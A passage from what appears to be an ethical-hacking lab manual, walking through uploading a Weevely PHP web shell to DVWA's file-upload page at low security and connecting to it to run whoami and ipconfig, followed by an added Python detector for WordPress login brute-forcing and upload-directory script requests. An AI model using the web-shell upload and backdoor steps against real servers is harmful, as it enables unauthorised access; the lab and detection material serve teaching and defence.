Click DVWA Security in the left pane to view the DVWA security level.

10. Change the Security Level from impossible to low by selecting Low from the drop-down list and clicking the Submit button, as shown in the screenshot.
11. Click the File Upload option from the left pane.

12. The Vulnerability: File Upload page appears. Click the Browse… button to upload a file.
13. The File Upload window appears; navigate to the Desktop location,
select the payload file shell.php, and click Open.
14. Observe that the selected file (shell.php) appears to the right of
the Browse… button.

15. Now, click the Upload button to upload the file to the database.
16. You will see a message that the file has successfully been uploaded, with
the location of the file. Note the location of the file and minimize the browser
window.
17. Switch back to the Terminal window, type weevely http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php [Password] (the password that you provided in Step 2), and press Enter. This command establishes a connection with the payload and interacts with the target.

Here, the password is toor.


18. You can observe that a session has successfully been established with
the victim system.
19. Now, type whoami and press Enter to view the system details of the
victim machine.

20. The result appears, displaying the running system privileges and the
present working directory, as shown in the screenshot.
21. Now, type ipconfig and press Enter to view the IP configuration of the
victim machine.

22. The result appears, displaying the victim machine's IP address, default gateway, IPv6 address, and other information.
23. This concludes the demonstration of how to gain backdoor access via a
web shell using Weevely.

24. Close all open windows and document all the acquired information.
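Two of the activities in this module leave characteristic traces in the web server's access log: the wp-login.php dictionary attack of Task 5 and the direct requests to an uploaded .php file in Tasks 7 and 8. The Python below is an added example (not part of the lab) that runs a simple detection over constructed Apache combined-format log lines using the lab's addresses; the thresholds and the 200-versus-302 login-result assumption are mine.

```python
"""Added example (not part of the lab): detection over web server access logs for
the wp-login.php dictionary attack (Task 5) and for requests to a script file in
an upload directory (Tasks 7 and 8). Log lines are constructed in Apache
combined format using the lab's addresses; thresholds are illustrative."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

LOGIN_THRESHOLD = 10                  # this many POSTs to wp-login.php from one IP ...
LOGIN_WINDOW = timedelta(minutes=2)   # ... inside this window is treated as a dictionary attack
# A script being requested from an upload directory is the web shell case.
UPLOAD_SCRIPT_RE = re.compile(r"/uploads/[^?]*\.(php\d?|phtml|phar)(\?|$)", re.IGNORECASE)


def parse(line: str) -> Optional[dict]:
    """Parse one combined-format line; None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect(lines: List[str]) -> Dict[str, List[str]]:
    """Return findings keyed by category; an empty dict means nothing was flagged."""
    findings: Dict[str, List[str]] = defaultdict(list)
    login_posts: Dict[str, list] = defaultdict(list)   # ip -> [(ts, status)]
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            login_posts[rec["ip"]].append((rec["ts"], rec["status"]))
        if UPLOAD_SCRIPT_RE.search(rec["path"]):
            findings["webshell_access"].append(
                f'{rec["ip"]} {rec["method"]} {rec["path"]} -> {rec["status"]}')
    for ip, events in login_posts.items():
        events.sort()
        start, burst = 0, False
        for end in range(len(events)):            # sliding window over timestamps
            while events[end][0] - events[start][0] > LOGIN_WINDOW:
                start += 1
            if end - start + 1 >= LOGIN_THRESHOLD:
                burst = True
                break
        if burst:
            # Assumption: WordPress answers a failed login with 200 and a successful
            # one with a 302 redirect, so a 302 in the burst marks the guessed password.
            success = any(status == 302 for _, status in events)
            findings["wp_login_bruteforce"].append(
                f"{ip}: {len(events)} POSTs to wp-login.php, {LOGIN_THRESHOLD}+ within "
                f"{LOGIN_WINDOW}" + (", including a successful login" if success else ""))
    return dict(findings)


def _line(ip: str, ts: datetime, method: str, path: str, status: int) -> str:
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


# Constructed sample log: a burst against wp-login.php that ends in a successful login,
# two benign requests, and two hits on scripts in the DVWA uploads directory.
_T0 = datetime(2021, 3, 1, 10, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = [_line("10.10.10.13", _T0 + timedelta(seconds=i), "POST", "/CEH/wp-login.php", 200)
              for i in range(11)]
SAMPLE_LOG.append(_line("10.10.10.13", _T0 + timedelta(seconds=11), "POST", "/CEH/wp-login.php", 302))
SAMPLE_LOG += [
    _line("10.10.10.20", _T0, "GET", "/dvwa/login.php", 200),
    _line("10.10.10.20", _T0, "GET", "/dvwa/hackable/uploads/photo.png", 200),
    _line("10.10.10.13", _T0 + timedelta(minutes=5), "GET", "/dvwa/hackable/uploads/shell.php", 200),
    _line("10.10.10.13", _T0 + timedelta(minutes=5, seconds=1), "POST",
          "/dvwa/hackable/uploads/medium.php", 200),
]

if __name__ == "__main__":
    for category, items in detect(SAMPLE_LOG).items():
        print(category)
        for item in items:
            print("  ", item)
```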
